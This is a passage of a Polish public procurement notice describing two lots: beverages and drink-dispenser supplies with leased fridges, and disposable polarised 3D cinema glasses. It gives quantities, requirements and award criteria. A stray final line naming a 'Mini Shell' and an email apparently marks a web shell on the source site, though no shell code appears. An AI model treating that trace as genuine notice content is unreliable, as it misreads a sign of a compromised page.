                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 9 zamówienia  Dostawa napojów bezalkoholowych i wody mineralnej w butelkach oraz produktów do przygotowywania napojów bezalkoholowych z dystrybutora: syropu, gazu CO2, kubków jednorazowych, pokrywek, słomek


1.	Przedmiot zamówienia:
a)	napoje bezalkoholowe gazowane w butelkach PET 0,5  L  -  ilość max do 40.000 szt.,
b)	napoje bezalkoholowe gazowane w butelkach szklanych 0,2  L -  ilość max do 300 szt.,
c)	herbaty mrożone w butelkach PET 0,5 L  ilość max do 25.000 szt.,
d)	woda mineralna gazowana w butelkach PET 0,5 L  ilość max do 5.000 szt.,
e)	woda mineralna niegazowana w butelkach PET 0,5 L  ilość max do 13.000 szt.,
f)	woda mineralna gazowana w butelkach szklanych 0,33 L  ilość max do 500 szt.,
g)	woda mineralna niegazowana w butelkach szklanych 0,33 L  ilość max do 1.000 szt.
h)	soki w butelkach PET 0,33 L  ilość max do 11.000 szt.,
i)	napoje energetyzujące w butelkach PET 0,5  L -   ilość max do 1.000 szt.,
j)	napoje energetyzujące w puszkach 0,25  L  -  ilość max do 1.000 szt.,
k)	napoje energetyzujące w puszkach 0,5  L  -  ilość max do 1.000 szt.,
l)	syrop w kartonach 20L do sporządzania napoju gazowanego z dystrybutora  -  ilość max do 5.000 L,
m)	gaz CO2 w butlach do 10 kg do sporządzania napoju z dystrybutora  -  ilość max do 400 kg,
n)	kubek o pojemności 0,3  L  -  ilość max do 15.000 szt.,
o)	kubek o pojemności 0,4  L -   ilość max do 20.000 szt.,
p)	kubek o pojemności 0,5  L  -  ilość max do 40.000 szt.,
q)	pokrywki do trzech rozmiarów kubków o pojemności 0,3 L; 0,4 L; 0,5  L  -  ilość max do 75.000 szt.,
r)	słomki do napojów  -  ilość max do 95.000 szt.  

2.	Wymagania:
-napoje w butelkach PET pakowane w zgrzewki (folię termokurczliwą) ułatwiające transport i magazynowanie,
-napoje w butelkach szklanych umieszczone w skrzynkach zabezpieczających przed rozbiciem w czasie transportu i magazynowania, posiadające etykiety z kodem kreskowym produktu,
-napoje w puszkach pakowane w kartonową podstawkę oraz folię termokurczliwą zapobiegającą wgnieceniu i ułatwiającą transport a także magazynowanie,
-wyposażenie Zamawiającego w  lodówki do napojów ( 2 szt. ) - obejmujące dzierżawę, dostawę, instalację, serwis.
Wymiary lodówek:
a)lodówka dwudrzwiowa: wymiary max do 200x90x70 cm,
b)lodówka jednodrzwiowa: wymiary max do 190x50x70 cm,
-syrop w workach do 20  L  wyposażonych w specjalny zawór  umożliwiający podłączenie do dystrybutora, worki zapakowane w grube i twarde kartony zabezpieczające przed pęknięciem,
-gaz CO2  w butlach  do 10 kg,
-kubki jednorazowego użytku z  nadrukiem nazwy napoju, wykonane z papieru powlekanego bio-powłoką, zamykane szczelnie pokrywką,
-pokrywki z otworem na słomkę, dopasowane do średnicy kubków,
-słomki do napojów długie, opakowane w papierki, każda oddzielnie, 
-wyposażenie Zamawiającego w automat ze schładzarką (1 szt.) do napojów nalewanych  - obejmujące dzierżawę, dostawę, instalację, serwis i uruchomienie urządzenia,
-wyposażenie Zamawiającego w materiały reklamowe świetlne prezentujące napoje w zestawach barowych
-dostawa na miejsce wskazane przez Zamawiającego.    
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15980000-1<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>60</td></tr><tr><td>opakowanie przyjazne dla środowiska</td><td>20</td></tr><tr><td>czas dostawy produktów w przypadku reklamacji</td><td>20</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>10
                  
                <b>Nazwa: </b> Część 10 zamówienia  Dostawa okularów polaryzacyjnych jednorazowego użytku                    do projekcji 3D w systemie DepthQ na srebrnych ekranach<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 10 zamówienia  Dostawa okularów polaryzacyjnych jednorazowego użytku                    do projekcji 3D w systemie DepthQ na srebrnych ekranach

1.Przedmiot zamówienia:
a)	okulary dla dorosłych  ilość max do 35.000 szt., 
b)	okulary dziecięce  ilość max do 10.000 szt., 
c)	okulary wielorazowe/premium duże  ilość max do 400 szt., 
d)	nakładki na okulary korekcyjne  ilość max do 200 szt. 

2. Wymagania:
-okulary polaryzacyjne jednorazowego użytku do projekcji 3D w systemie DepthQ na srebrnych ekranach
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>33734000-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 12<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena </td><td>60</td></tr><tr><td>czas dostawy produktów w przypku reklamacji</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com